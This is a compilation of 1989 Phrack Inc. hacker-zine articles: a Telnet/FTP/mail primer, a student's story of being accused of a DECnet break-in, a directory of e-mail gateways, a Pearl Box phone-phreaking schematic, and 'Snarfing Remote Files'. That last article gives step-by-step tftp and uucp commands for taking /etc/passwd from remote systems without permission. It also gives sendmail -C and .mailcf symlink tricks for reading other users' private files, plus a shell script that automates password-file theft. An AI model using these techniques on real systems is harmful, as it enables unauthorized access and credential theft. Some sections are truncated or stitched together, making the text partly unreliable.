following: The "local computer" is the computer that you are currently using and
the
"remote computer" is the computer on the network with which you are or
will be communicating. Note
that the terms "host" and "computer" are
synonymous in the following discussion.
To use Telnet, simply enter the
command: TELNET
The prompt that Telnet gives is: Telnet>
(However, you can specify where you want to Telnet to immediately and
bypass the the prompts and other
delays by issuing the command: TELNET
[location].)
There is help available by typing in ?. This prints a list
of all the valid subcommands that Telnet
provides with a one-line
explanation.
Telnet> ?
To connect to to another computer, use
the open subcommand to open a connection to that computer. For
example, to
connect to the host "UMCVMB.MISSOURI.EDU", do "open umcvmb.missouri.edu"
Telnet will resolve (i.e. Translate, the hostname "umcvmb.missouri.edu"
into an IP address and will
send a packet to that host requesting login. If
the remote host decides to let you attempt a login, it
prompts you for your
username and password. If the host does not respond, Telnet will "time out"
(i.e.
Wait for a reasonable amount of time such as 20 seconds) and then
terminate with a message such as
"Host not responding."
If your
computer does not have an entry for a remote host in its hosttable and it cannot
resolve the
name, you can use the IP address explicitly in the telnet
command. For example,
TELNET 26.0.0.73 (Note: This is the IP address for
the DDN Network Information Center [SRI-NIC.ARPA])
If you are successful
in logging in, your terminal is connected to the remote host. For all intents
and purposes, your terminal is directly hard-wired to that host and you
should be able to do anything
on your remote terminal that you can do at any
local terminal. There are a few exceptions to this
rule, however.
Telnet provides a network escape character, such as CONTROL-T. You can
find out what the escape
character is by entering the "status" subcommand:
Telnet> status
You can change the escape character by
entering the "escape" subcommand:
Telnet> escape
When you
type in the escape character, the Telnet prompt returns to your screen and you
can enter
subcommands. For example, to break the connection, which usually
logs you off the remote host, enter
the subcommand "quit":
Telnet> quit
Your Telnet connection usually breaks when you
log off the remote host, so the "quit" subcommand is
not usually used to log
off.
When you are logged in to a remote computer via Telnet, remember
that there is a time delay between
your local computer and the remote one.
This often becomes apparent to users when scrolling a long
file across the
terminal screen nd they wish to cancel the scrolling by typing CONTROL-C or
something
similar. After typing the special control character, the scrolling
continues. The special control
character takes a certain amount of time to
reach the remote computer which is still scrolling
information. Thus
response from the remote computer will not likely be as quick as response from a
local computer.
Once you are remotely logged on, the computer you
are logged on to effectively becomes your "local
computer," even though your
original "local computer" still considers you logged on. You can log on to
a
third computer which would then become your "local computer" and so on. As you
log out of each
session, your previous session becomes active again.
File Transfer
FTP is the program that allows files to be sent
from one computer to another. "FTP" stands for "File
Transfer Protocol".
When you start using FTP, a communications channel with another computer
on the network is opened. For
example, to start using FTP and initiate a
file transfer session with a computer on the network called
"UMCVMB", you
would issue the following subcommand:
FTP UMCVMB.MISSOURI.EDU
Host "UMCVMB" will prompt you for an account name and password. If your
login is correct, FTP will
tell you so, otherwise it will say "login
incorrect." Try again or abort the FTP program. (This is
usually done by
typing a special control character such as CONTROL-C. The "program abort"
character
varies from system to system.)
Next you will see the FTP
prompt, which is:
Ftp>
There are a number of subcommands of
FTP. The subcommand "?" will list these commands and a brief
description of
each one.
You can initiate a file transfer in either direction with FTP,
either from the remote host or to the
remote host. The "get" subcommand
initiates a file transfer from the remote host (i.e. Tells the
remote
computer to send the file to the local computer [the one on which you issued the
"ftp"
command]). Simply enter "get" and FTP will prompt you for the remote
host's file name and the (new)
local host's file name. Example:
Ftp> get
Remote file name?
theirfile
local file name?
myfile
ou can abbreviate this by typing both file names on the same
line as the "get" subcommand. If you do
not specify a local file name, the
new local file will be called the same thing as the remote file.
Valid FTP
subcommands to get a file include the following:
get theirfile myfile
get doc.x25
The "put" subcommand works in a similar fashion and is
used to send a file from the local computer to
the remote computer. Enter
the command "put" and FTP will prompt you for the local file name and then
the remote file name. If the transfer cannot be done because the file
doesn't exist or for some other
reason, FTP will print an error message.
There are a number of other subcommands in FTP that allow you to do many
more things. Not all of these
are standard so consult your local
documentation or type a question mark at the FTP prompt. Some
functions
often built into FTP include the ability to look at files before getting or
putting them,
the ability to change directories, the ability to delete files
on the remote computer, and the ability
to list the directory on the remote
host.
An intriguing capability of many FTP implementations is "third
party transfers." For example, if you
are logged on computer A and you want
to cause computer B to send a file to computer C, you can use
FTP to connect
to computer B and use the "rmtsend" command. Of course, you have to know
usernames and
passwords on all three computers, since FTP never allows you
to peek into someone's directory and
files unless you know their username
and password.
The "cd" subcommand changes your working directory on the
remote host. The "lcd" subcommand changes
the directory on the local host.
For UNIX systems, the meaning of these subcommands is obvious. Other
systems, especially those that do not have directory-structured file system,
may not implement these
commands or may implement them in a different
manner.
The "dir" and "ls" subcommands do the same thing, namely list
the files in the working directory of of
the remote host.
The "list"
subcommand shows the contents of a file without actually putting it into a file
on the
local computer. This would be helpful if you just wanted to inspect a
file. You could interrupt it
before it reached the end of the file by typing
CONTROL-C or some other special character. This is
dependent on your FTP
implementation.
The "delete" command can delete files on the remote
host. You can also make and remove directories on
the remote host with
"mkdir" and "rmdir". The "status" subcommand will tell you if you are connected
and with whom and what the state of all your options are.
If you are
transferring binary files or files with any non-printable characters, turn
binary mode on
by entering the "binary" subcommand:
binary
To resume non-binary transfers, enter the "ascii" subcommand.
Transferring a number of files can be done easily by using "mput"
(multiple put) and "mget" (multiple
get). For example, to get every file in
a particular directory, first issue a "cd" command to change
to that
directory and then an "mget" command with an asterisk to indicate every file:
cd somedirectory
mget *
When you are done, use the "close"
subcommand to break the communications link. You will still be in
FTP, so
you must use the "bye" subcommand to exit FTP and return to the command level.
The "quit"
subcommand will close the connection and exit from FTP at the
same time.
Mail
Mail is the simplest network facility to use in
many ways. All you have to do is to create your
message, which can be done
with a file editor or on the spur of the moment, and then send it. Unlike
FTP and Telnet, you do not need to know the password of the username on the
remote computer. This is
so because you cannot change or access the files of
the remote user nor can you use their account to
run programs. All you can
do is to send a message.
There is probably a program on your local
computer which does mail between users on that computer.
Such a program is
called a mailer. This may or may not be the way to send or receive mail from
other
computers on the network, although integrated mailers are more and
more common. UNIX mailers will be
used as an example in this discussion.
Note that the protocol which is used to send and receive mail over a
TCP/IP network is called SMTP,
the "Simple Mail Transfer Protocol."
Typically, you will not use any program called SMTP, but rather
your local
mail program.
UNIX mailers are usually used by invoking a program named
"mail". To receive new mail, simply type
"mail".
There are several
varieties of UNIX mailers in existence. Consult your local documentation for
details. For example, the command "man mail" prints out the manual pages for
the mail program on your
computer.
To send mail, you usually specify
the address of the recipient on the mail command. For example: "mail
knight@umcvmb.missouri.edu" will send the following message to username
"knight" on host "umcvmb".
You can usually type in your message one line
at a time, pressing RETURN after each line and typing
CONTROL-D to end the
message. Other facilities to include already-existing files sometimes exist. For
example, Berkeley UNIXes allow you to enter commands similar to the
following to include a file in
your current mail message:
r myfile
In this example, the contents of "myfile" are inserted into the message
at this point.
Most UNIX systems allow you to send a file through the
mail by using input redirection. For example:
mail
knight@umcvmb.missouri.edu < myfile
In this example, the contents of
"myfile" are sent as a message to "knight" on "umcvmb."
Note that in
many UNIX systems the only distinction between mail bound for another user on
the same
computer and another user on a remote computer is simply the
address specified. That is, there is no
hostname for local recipients.
Otherwise, mail functions in exactly the same way. This is common for
integrated mail packages. The system knows whether to send the mail locally
or through the network
based on the address and the user is shielded from
any other details.
"The Quest For Knowledge Is Without End..."
Index
==Phrack Inc.== Volume Three, Issue 27, File 7 of 12
################################################
### ###
### The
Making Of A Hacker ###
### ###
### by Framstag of West Germany ###
### ###
### June 2, 1989 ###
### ###
################################################
Prologue For None
VMS Users
~~~~~~~~~~~~~~~~~~~~~~~~~~~ DECnet is the network for DEC
machines, in most cases you can say VAXes.
DECnet allows you to do:
* -
e-mail
* - file transfer
* - remote login
* - remote command
* -
remote job entry
* - PHONE
PHONE is an interactive communication
between users and is equal to TALK on UNIX or a "deluxe"-CHAT on
VM/CMS.
BELWUE, the university network of the state Baden-Wuerttemberg in West
Germany contains (besides other
networks) a DECnet with about 400 VAXes. On
every VAX there is standard-account called DECNET with
pw:= DECNET, which is
not reachable via remote login. This account is provided for several
DECnet-Utilities and as a pseudo-guest-account. The DECNET-account has very
restricted privileges: You
cannot edit a file or make another remote login.
The HELP-menu is equipped by the system and is similar to the MAN
command on UNIX.
More information on DECnet can be found in "Looking
Around In DECnet" by Deep Thought in this very
issue of Phrack Inc.
Here, at the University of Ulm, we have an *incredibly* ignorant
computer center staff, with an even
bigger lack of system-literature
(besides the 80 kg of VAX/VMS-manuals). The active may search for
information by himself, which is over the level of "run," "FORTRAN," or
"logout." My good luck that I
have other accounts in the BELWUE-DECnet,
where more information is offered for the users. I am a
regular student in
Ulm and all my accounts are completely legal and corresponding to the German
laws.
I don't call myself a "hacker," I feel more like a "user" (...it's
more a defining-problem).
In the HELP-menu in a host in Tuebingen I
found the file netdcl.com and the corresponding explanation,
which sends
commands to the DECNET-Account of other VAXes and executes them there (remote
command).
The explanation in the HELP-menu was idiot-proof -- therefore for
me, too :-)
With the command "$ mcr ncp show known nodes" you can obtain
a list of all netwide active VAXes, as is
generally known, and so I pinged
all these VAXes to look for more information for a knowledge-thirsty
user.
With "help", "dir" and other similar commands I look around on those DECnet
accounts, always
watching for topics related to the BELWUE-network. It's a
pity, that 2/3 of all VAXes have locked the
DECNET-Account for NETDCL.COM.
Their system managers are probably afraid of unauthorized access, but I
cannot imagine how there could be such an unauthorized access, because you
cannot log on this account
-- no chance for trojan horses, etc.
Some
system managers called me back after I visited their VAX to chat with me about
the network and
asked me if they could help me in any way. One sysop from
Stuttgart even sent me a version of
NETDCL.COM for the ULTRIX operation
system.
Then, after a month, the H O R R O R came over me in shape of a
the following mail:
From: TUEBINGEN::SYSTEM 31-MAY-1989 15:31:11.38
To:
FRAMSTAG
CC:
Subj: don't make any crap, or you'll be kicked out!
From: ITTGPX::SYSTEM 29-MAY-1989 16:46
To: TUEBINGEN::SYSTEM
Subj: System-breaking-in 01-May-1989
To the system manager of the
Computer TUEBINGEN, On May 1st 1989 we had a System-breaking-in in our
DECNET-account, which started from your machine. By help of our accounting
we ascertained your user
FRAMSTAG to have emulated an interactive log-on on
our backbone-node and on every machine of our
VAX-cluster with the "trojan
horse" NETDCL.COM. Give us this user's name and address and dear up the
occurrence completely. We point out that the user is punishable. In case of
repetition we would be
forced to take corresponding measures. We will check
whether our system got injured. If not, this time
we will disregard any
measure. Inform us via DECnet about your investigation results -- we are
attainable by the nodenumber 1084::system
Dipl.-Ing. Michael Hager
My system manager threatened me with the deleting of my account, if I
would not immediately enlighten
the affair. *Gulp*!
I was conscious
about my innocence, but how to tell it to the others? I explained, step by step,
everything to my system manager. He then understood after a while, but the
criminal procedure still
hovered over me... so, I took quickly to my
keyboard, to compose file of explanations and to send it
to that angry
system manager in Stuttgart (node 1084 is an institute there). But no way out:
He had
run out of disk quota and my explanation-mail sailed into the
nirwana:
$ mail explanation
To: 1084::system
%MAIL-E, error sending
to user SYSTEM at 1084
%MAIL-E-OPENOUT, error opening
SYS$SYSROOT:[SYSMGR]MAIL$00040092594FD194.MAI;
as output
-RMS-E-CRE, ACP
file create failed
-SYSTEM-F-EXDISKQUOTA, disk quota exceeded
Also
the attempt of a connection with the PHONE-facilty failed: In his borderless
hacker-paranoia, he
cut off his PHONE... and nowhere is a list with the
REAL-addresses of the virtual DECnet-addresses
available (to prevent
hacking). Now I stood there with the brand "DANGEROUS HACKER!" and I had no
chance to vindicate myself. I poured out my troubles to an acquaintance of
mine, who is a sysop in the
computer-center in Freiburg. He asked other
sysops and managers thru the whole BELWUE-network until
someone gave him a
telephone number after a few days -- and that was the right one!
I
phoned to this Hager and told him what I had done with his DECnet-account and
also what NOT. I
wanted to know which crime I had committed. He promptly
cancelled all of his reproaches, but he did
not excuse his defamous
incriminations. I entreated him to inform my system manager in Tuebingen that
I have done nothing illegal and to stop him from erasing my account. This
happens already to a fellow
student of mine (in this case, Hager was also
guilty). He promised me that he would officially cancel
his reproaches.
After over a week this doesn't happen (I'm allowed to use my account
further on). In return for it, I
received a new mail from Hager on another
account of mine:
From: 1084::HAGER 1-JUN-1989 12:51
To: 50180::STUD_11
Subj: System-breaking-in
On June 1st 1989 you have committed a
system-breaking-in on at least one of our VAXes. We were able to
register
this occurrence. We would be forced to take further measure if you did not dear
up the
occurrence completely until June 6th.
Of course the expenses
involved would be imposed on you. Hence enlightenment must be in your own
interest.
We are attainable via DECnet-mail with the address
1084::HAGER or via following address:
Institut fuer Technische Thermodynamik
und Thermische Verfahrenstechnik
Dipl.-Ing. M. Hager Tel.: 0711/685-6109
Dipl.-Ing. M. Mrzyglod Tel.: 0711/685-3398
Pfaffenwaldring 9/10-1
7000 Stuttgart-80
M. Hager M. Mrzyglod
This was the reaction
of my attempt: "$ PHONE 1084::SYSTEM". I have not answered to this mail. I AM
SICK OF IT!
Framstag (FRAMSTAG@DTUPEV5A.BITNET)
With Special
Thanks For Translation Assistance To Schrulli B.
Index
==Phrack Inc.== Volume Three, Issue 28, File #4 of 12
Network Miscellany
~~~~~~~~~~~~~~~~~~
by Taran King
June 1,
1989
ACSNET
Australian Computer Science Network (ACSNET), also
known as Oz, has its gateway through the CSNET node
munnari.oz.au and if you
cannot directly mail to the oz.au domain, try either
username%munnari.oz.au@UUNET.UU.NET or munnari!username@UUNET.UU.NET.
AT&T MAIL
AT&T Mail is a mailing service of AT&T,
probably what you might call it's MCI-Mail equivalent. It is
available on
the UUCP network as node name attmail but I've had problems having mail get
through.
Apparently, it does cost money to mail to this service and the
surrounding nodes are not willing to
pick up the tab for the ingoing mail,
or at least, this has seemingly been the case thus far. I
believe, though,
that perhaps routing to att!attmail!user would work.
AT&T recently
announced six new X.400 interconnections between AT&T Mail and electronic
mail services
in the U.S., Korea, Sweden, Australia, and Finland. In the
U.S., AT&T Mail is now interconnected with
Telenet Communications
Corporation's service, Telemail, allowing users of both services to exchange
messages easily. With the addition of these interconnections, the AT&T
Mail Gateway 400 Service allows
AT&T Mail subscribers to exchange
messages with users of the following electronic messaging systems:
Company
E-Mail Name* Country
------- ------------ -------
TeleDelta TeDe 400
Sweden
OTC MPS400 Australia
Telecom-Canada Envoy100 Canada
DACOM
DACOM MHS Korea
P&T-Tele MailNet 400 Finland
Helsinki Telephone Co.
ELISA Finland
Dialcom Dialcom USA
Telenet Telemail USA
KDD Messavia
Japan
Transpac ATLAS400 France
The interconnections are based on the
X.400 standard, a set of guidelines for the format, delivery and
receipt of
electronic messages recommended by an international standards committee the
CCITT.
International X.400 messages incur a surcharge. They are:
To
Canada:
Per note: $.05
Per message unit: $.10
To other
international locations:
Per note: $.20
Per message unit: $.50
There is no surcharge for X.400 messages within the U.S. The following
are contacts to speak with
about mailing through these mentioned networks.
Other questions can be directed through AT&T Mail's
toll-free number,
1-800-624-5672.
MHS Gateway: mhs!atlas MHS Gateway: mhs!dacom
Administrator: Bernard Tardieu Administrator: Bob Nicholson
Transpac
AT&T
Phone: 3399283203 Morristown, NJ 07960
Phone: +1 201 644 1838
MHS Gateway: mhs!dialcom MHS Gateway: mhs!elisa
Administrator: Mr.
Laraman Administrator: Ulla Karajalainen
Dialcom Nokia Data
South
Plainfield, NJ 07080 Phone: 01135804371
Phone: +1 441 493 3843
MHS
Gateway: mhs!envoy MHS Gateway: mhs!kdd
Administrator: Kin C. Ma
Administrator: Shigeo Lwase
Telecom Canada Kokusai Denshin Denwa CO.
Phone: +1 613 567 7584 Phone: 8133477419
MHS Gateway: mhs!mailnet
MHS Gateway: mhs!otc
Administrator: Kari Aakala Administrator: Gary W.
Krumbine
Gen Directorate Of Post & AT&T Information Systems
Phone: 35806921730 Lincroft, NJ 07738
Phone: +1 201 576 2658
MHS
Gateway: mhs!telemail MHS Gateway: mhs
Administrator: Jim Kelsay
Administrator: AT&T Mail MHS
GTE Telenet Comm Corp Gateway
Reston,
VA 22096 AT&T
Phone: +1 703 689 6034 Lincroft, NJ 08838
Phone: +1
800 624 5672
CMR
Previously known as Intermail, the Commercial
Mail Relay (CMR) Service is a mail relay service between
the Internet and
three commercial electronic mail systems: US Sprint/Telenet, MCI-Mail, and
DIALCOM
systems (i.e. Compmail, NSFMAIL, and USDA-MAIL).
An
important note: The only requirement for using this mail gateway is that the
work conducted must be
DARPA sponsored research and other approved
government business. Basically, this means that unless
you've got some
government-related business, you're not supposed to be using this gateway.
Regardless,
it would be very difficult for them to screen everything that
goes through their gateway. Before I
understood the requirements of this
gateway, I was sending to a user of MCI-Mail and was not contacted
about any
problems with that communication. Unfortunately, I mistyped the MCI-Mail address
on one of
the letters and that letter ended up getting read by system
administrators who then informed me that I
was not to be using that system,
as well as the fact that they would like to bill me for using it.
That was
an interesting thought on their part anyway, but do note that using this service
does incur
charges.
The CMR mailbox address in each system
corresponds to the label:
Telemail: [Intermail/USCISI]TELEMAIL/USA
MCI-Mail: Intermail or 107-8239
CompMail: Intermail or CMP0817
NSF-Mail: Intermail or NSF153
USDA-Mail: Intermail or AGS9999
Addressing examples for each e-mail system are as follows:
MCIMAIL:
123-4567 seven digit address
Everett T. Bowens person's name (must be
unique!)
COMPMAIL:
CMP0123 three letters followed by three or four
digits
S.Cooper initial, then "." and then last name
134:CMP0123 domain,
then ":" and then combination system and
account number
NSFMAIL:
NSF0123 three letters followed by three or four digits
A.Phillips
initial, then "." and then last name
157:NSF0123 domain, then ":" and then
combination system and
account number
USDAMAIL:
AGS0123 three
letters followed by three or four digits
P.Shifter initial, then "." and
then last name
157:AGS0123 domain, then ":" and then combination system and
account number
TELEMAIL:
BARNOC user (directly on Telemail)
BARNOC/LODH user/organization (directly on Telemail)
[BARNOC/LODH]TELEMAIL/USA
[user/organization]system branch/country
The following are other Telenet system branches/countries that can be
mailed to:
TELEMAIL/USA NASAMAIL/USA MAIL/USA TELEMEMO/AUSTRALIA
TELECOM/CANADA TOMMAIL/CHILE TMAILUK/GB ITALMAIL/ITALY
ATI/JAPAN
PIPMAIL/ROC DGC/USA FAAMAIL/USA
GSFC/USA GTEMAIL/USA TM11/USA
TNET.TELEMAIL/USA
USDA/USA
Note: OMNET's ScienceNet is on the
Telenet system MAIL/USA and to mail to it, the format would be
[A.MAILBOX/OMNET]MAIL/USA. The following are available subdivisions of
OMNET:
AIR Atmospheric Sciences
EARTH Solid Earth Sciences
LIFE
Life Sciences
OCEAN Ocean Sciences
POLAR Interdisciplinary Polar Studies
SPACE Space Science and Remote Sensing
The following is a list of
DIALCOM systems available in the listed countries with their domain and
system numbers:
Service Name Country Domain Number System Number
~~~~~~~~~~~~ ~~~~~~~ ~~~~~~~~~~~~~ ~~~~~~~~~~~~~
Keylink-Dialcom
Australia 60 07, 08, 09
Dialcom Canada 20 20, 21, 22, 23, 24
DPT
Databoks Denmark 124 71
Telebox Finland 127 62
Telebox West Germany 30
15, 16
Dialcom Hong Kong 80 88, 89
Eirmail Ireland 100 74
Goldnet
Israel 50 05, 06
Mastermail Italy 130 65, 67
Mastermail Italy 1 66, 68
Dialcom Japan 70 13, 14
Dialcom Korea 1 52
Telecom Gold Malta 100 75
Dialcom Mexico 1 52
Memocom Netherlands 124 27, 28, 29
Memocom
Netherlands 1 55
Starnet New Zealand 64 01, 02
Dialcom Puerto Rico 58 25
Telebox Singapore 88 10, 11, 12
Dialcom Taiwan 1 52
Telecom Gold
United Kingdom 100 01, 04, 17,
80-89
DIALCOM USA 1 29, 30, 31, 32,
33, 34, 37, 38,
41-59, 61, 62, 63,
90-99
NOTE: You can also
mail to username@NASAMAIL.NASA.GOV or username@GSFCMAIL.NASA.GOV instead of
going
through the CMR gateway to mail to NASAMAIL or GSFCMAIL.
For
more information and instructions on how to use CMR, send a message to the user
support group at
intermail-request@intermail.isi.edu (you'll get basically
what I've listed plus maybe a bit more).
Please read Chapter 3 of The Future
Transcendent Saga (Limbo to Infinity) for specifics on mailing to
these
destination mailing systems.
COMPUSERVE
CompuServe is well known
for its games and conferences. It does, though, have mailing capability. Now,
they have developed their own Internet domain, called COMPUSERVE.COM. It is
relatively new and mail
can be routed through either TUT.CIS.OHIO-STATE.EDU
or NORTHWESTERN.ARPA.
Example:
user%COMPUSERVE.COM@TUT.CIS.OHIO-STATE.EDU or replace TUT.CIS.OHIO-STATE.EDU
with
NORTHWESTERN.ARPA).
The CompuServe link appears to be a polled
UUCP connection at the gateway machine. It is actually
managed via a set of
shell scripts and a comm utility called xcomm, which operates via command
scripts
built on the fly by the shell scripts during analysis of what jobs
exist to go into and out of
CompuServe.
CompuServe subscriber
accounts of the form 7xxxx,yyyy can be addressed as 7xxxx.yyyy@compuserve.com.
CompuServe employees can be addressed by their usernames in the
csi.compuserve.com subdomain. CIS
subscribers write mail to
">inet:user@host.domain" to mail to users on the Wide-Area Networks, where
">gateway:" is CompuServe's internal gateway access syntax. The gateway
generates fully-RFC-compliant
headers.
To fully extrapolate -- from
the CompuServe side, you would use their EasyPlex mail system to send
mail
to someone in BITNET or the Internet. For example, to send me mail at my Bitnet
id, you would
address it to: INET:C488869%UMCVMB.BITNET@CUNYVM.CUNY.EDU
Or to my Internet id:
INET:C488869@UMCVMB.MISSOURI.EDU
Now, if you have a BITNET to Internet userid, this is a silly thing to
do, since your connect time to
CompuServe costs you money. However, you can
use this information to let people on CompuServe contact
YOU. CompuServe
Customer Service says that there is no charge to either receive or send a
message to
the Internet or BITNET.
DASNET
DASnet is a
smaller network that connects to the Wide-Area Networks but charges for their
service.
DASnet subscribers get charged for both mail to users on other
networks AND mail for them from users
of other networks. The following is a
brief description of DASnet, some of which was taken from their
promotional
text letter.
DASnet allows you to exchange electronic mail with people
on more than 20 systems and networks that
are interconnected with DASnet.
One of the drawbacks, though, is that, after being subscribed to these
services, you must then subscribe to DASnet, which is a separate cost.
Members of Wide-Area networks
can subscribe to DASnet too. Some of the
networks and systems reachable through DASnet include the
following:
ABA/net, ATT Mail, BIX (Byte Information eXchange), DASnet Network,
Dialcom, EIES, EasyLink, Envoy
100, FAX, GeoMail, INET, MCI Mail, NWI,
PeaceNet/EcoNet, Portal Communications, The Meta Network, The
Source,
Telemail, ATI's Telemail (Japan), Telex, TWICS (Japan), UNISON, UUCP, The WELL,
and Domains
(i.e. ".COM" and ".EDU" etc.). New systems are added all of the
time. As of the writing of this file,
Connect, GoverNET, MacNET, and The
American Institute of Physics PI-MAIL are soon to be connected.
You can
get various accounts on DASnet including:
* Corporate Accounts -- If your
organization wants more than one individual subscription.
* Site
Subscriptions -- If you want DASnet to link directly to your organization's
electronic mail
system.
To send e-mail through DASnet, you send the
message to the DASnet account on your home system. You
receive e-mail at
your mailbox, as you do now. On the Wide-Area Networks, you send mail to
XB.DAS@STANFORD.BITNET. On the Subject: line, you type the DASnet address in
brackets and then the
username just outside of them. The real subject can be
expressed after the username separated by a "!"
(Example: Subject:
[0756TK]randy!How's Phrack?).
The only disadvantage of using DASnet as
opposed to Wide-Area networks is the cost. Subscription costs
as of 3/3/89
cost $4.75 per month or $5.75 per month for hosts that are outside of the U.S.A.
You are also charged for each message that you send. If you are
corresponding with someone who is not
a DASnet subscriber, THEIR MAIL TO YOU
is billed to your account.
The following is an abbreviated cost list for
mailing to the different services of DASnet:
PARTIAL List DASnet Cost DASnet
Cost
of Services 1st 1000 Each Add'l 1000
Linked by DASnet (e-mail)
Characters Characters:
INET, MacNET, PeaceNet, NOTE: 20 lines
Unison, UUCP*, Domains, .21 .11 of text is app.
e.g. .COM, .EDU* 1000
characters.
Dialcom--Any "host" in U.S. .36 .25
Dialcom--Hosts
outside U.S. .93 .83
EasyLink (From EasyLink) .21 .11
(To EasyLink)
.55 .23
U.S. FAX (internat'l avail.) .79 .37
GeoMail--Any "host"
in U.S. .21 .11
GeoMail--Hosts outside U.S. .74 .63
MCI (from MCI)
.21 .11
(to MCI) .78 .25
(Paper mail - USA) 2.31 .21
Telemail
.36 .25
W.U. Telex--United States 1.79 1.63
(You can also send
Telexes outside the U.S.)
TWICS--Japan .89 .47
* The charges
given here are to the gateway to the network. The DASnet user is not charged for
transmission on the network itself.
Subscribers to DASnet get a free
DASnet Network Directory as well as a listing in the directory, and
the
ability to order optional DASnet services like auto-porting or DASnet Telex
Service which gives
you your own Telex number and answerback for $8.40 a
month at this time.
DASnet is a registered trademark of DA Systems, Inc.
DA Systems, Inc.
1503 E. Campbell Ave.
Campbell, CA 95008
408-559-7434
TELEX: 910 380-3530
The following two sections on
PeaceNet and AppleLink are in association with DASnet as this network is
what is used to connect
There was an error in the transcieving.
Part was erased. This is all That was Salvageble...
Sorry.. -= Exodus =-
Index
==Phrack Inc.== Volume Three, Issue 28, File #5 of 12
/////////////////////\\\\\\\\\\\\\\\\\\\\\
|| ||
|| A Real
Functioning PEARL BOX Schematic ||
|| ||
|| Written, Tested, and Used ||
|| ||
|| by Dispater ||
|| ||
|| July 1, 1989 ||
|| ||
\\\\\\\\\\\\\\\\\\\\\/////////////////////
Introduction:
After reading the earlier renditions of schematics for the Pearl Box, I
decided that there was an
easier and cheaper way of doing the same thing
with an IC and parts you probably have just laying
around the house.
What Is A Pearl Box and Why Do I Want One?
A Pearl Box is a tone
generating device that is used to make a wide range of single tones. Therefore,
it would be very easy to modify this basic design to make a Blue Box by
making 2 Pearl Boxes and
joining them together in some fashion.
A
Pearl Box can be used to create any tone you wish that other boxes may not. It
also has a tone sweep
option that can be used for numerous things like
detecting different types of phone tapping devices.
Parts List:
*
CD4049 RCA integrated circuit
* .1 uF disk capacitor
* 1 uF 16V
electrolitic capacitor
* 1K resistor
* 10M resistor
* 1meg pot
*
1N914 diode
* Some SPST momentary push-button switches
* 1 SPDT toggle
switch
* 9 Volt battery & clip
* and miscellaneous stuff you should
have laying around the house.
State-of-the-Art-Text Schematic:
+
16V 1uF -
_______________________________||_____
| ! ! || | _
|
_______________________ |__________| |/| 8ohms
____|__|_____:__|__:__|_ |
__________| | |
| 9 10 11 12 13 14 15 16 | | | |_|\|
| CD4049UBE | | |
|_1__2__3__4__5__6__7__8_| : | _
| | |__| |__| |
|____________________|_________[-]
| | ! ! : [b]
|
|__________________________| [a]
| : : | [t]
| ! 1N914 ! ! [t]
|___________|/|_____________________________________[+]
: |\| : :
|
| |
| 10M | |
|___/\/\/\__| |
| | |
|_____||____| | <-- These
2 wires to the center pole
|| | | of switch.
.1uF 50V | |
| |
_______________________| |_____________________________
| ___[Toggle
Switch]____________ |
| | | ___ |
| | | o o |
| | | /\/\/\___| |__|
|_/\/\/\____/\/\/\ | | ^ |
1K ^ | |____| ___ |
|___| | o o |
|
/\/\/\___| |__|
- Exodus -
Index
==Phrack Inc.== Volume Three, Issue 28, File #6 of 12
+++++++++++++++++++++++++++++++++++++
+ +
+ Snarfing Remote
Files +
+ +
+ by +
+ +
+ Dark OverLord +
+ +
+++++++++++++++++++++++++++++++++++++
There are many ways of getting
copies of files from a remote system that you do not have permission to
read
or an account on login on to and access them through. Many administrators do not
even bother to
restrict many access points that you can use.
Here
are the simplest ways:
* Use uucp(1) [Trivial File Transfer Protocol] to
retrieve a copy of a file if you are running on an
Internet based network.
* Abuse uucp(1) [Unix to Unix Copy Program] to retrieve a copy of a file if
uucp connections are
running on that system.
* Access one of many known
security loopholes.
In the following examples, we will use the passwd
file as the file to acquire since it is a readable
file that can be found on
most systems that these attacks are valid on.
Method A :
* First
start the tftp program:
Enter the command:
tftp
[You have the
following prompt:]
tftp>
* The next step is to connect to the system
that you wish to retrieve files from. At the tftp, type:
tftp> connect
other.system.com
* Now request the file you wish to get a copy of (in our
case, the passwd file /etc/passwd ):
tftp> get /etc/passwd /tmp/passwd
[You should see something that looks like the following:]
Received
185659 bytes in 22 seconds.
* Now exit the tftp program with the "quit"
command: tftp> quit
You should now have a copy of other.system.com's
passwd file in your directory.
NOTE: Some Unix systems' tftp programs
have a different syntax. The above was tested under SunOS 4.0
For
example, on Apollos, the syntax is:
tftp -{g|g!|p|r|w} [netascii|image]
Thus you must use the command:
tftp -g password_file networked-host /etc/passwd
Consult your
local "man" pages for more info (or in other words RTFM).
At the end of
this article, I will include a shell script that will snarf a password file from
a
remote host. To use it type:
gpw system_name
Method B :
Assuming we are getting the file /etc/passwd from the system uusucker, and our
system has a
direct uucp connection to that system, it is possible to
request a copy of the file through the uucp
links. The following command
will request that a copy of the passwd file be copied into uucp's home
directory /usr/spool/uucppublic :
uucp -m uusucker!/etc/passwd
'>uucp/uusucker_passwd'
The flag "-m" means you will be notified by
mail when the transfer is completed.
Method C:
The third
possible way to access the desired file requires that you have the login
permission to the
system.
In this case we will utilize a well-known
bug in Unix's sendmail daemon.
The sendmail program has and option "-C"
in which you can specify the configuration file to use (by
default this file
is /usr/lib/sendmail.cf or /etc/sendmail.cf). It should also be noted that the
diagnostics outputted by sendmail contain the offending lines of text. Also
note that the sendmail
program runs setuid root.
The way you can
abuse this set of facts (if you have not yet guessed) is by specifying the file
you
wish read as the configuration file. Thus the command:
sendmail
-C/usr/accounts/random_joe/private/file
Will give you a copy of random
joe's private file.
Another similar trick is to symlink your .mailcf
file to joe's file and mail someone. When mail
executes sendmail (to send
the mail), it will load in your mailcf and barf out joe's stuff.
First,
link joe's file to your .mailcf .
ln -s
/usr/accounts/random_joe/private/file $HOME/.mailcf
Next, send mail to
someone.
mail C488869@umcvmb.missouri.edu
And have fun.
-=-Cut Here=-=-=-Cut Here=-=-=- gpw.sh =-=-=-Cut Here=-=-=-=-Cut
Here=-=-=-=-=
:
: gpw copyright(c) Dark Overlord
:
/usr/ucb/tftp
$1 << EOF
mode ascii
verbose
trace
get /etc/passwd
/tmp/pw.$1
quit
EOF
Index
==Phrack Inc== Volume Three, Issue 30, File #10 of 12
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=== ===
=== Western
Union ===
=== Telex, TWX, and Time Service ===
=== ===
=== by Phone
Phanatic ===
=== ===
=== September 17, 1989 ===
=== ===
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
"Until a few years ago --
maybe ten -- it was very common to see TWX and Telex machines in almost
every business place."
There were only minor differences between
Telex and TWX. The biggest difference was that the former
was always run by
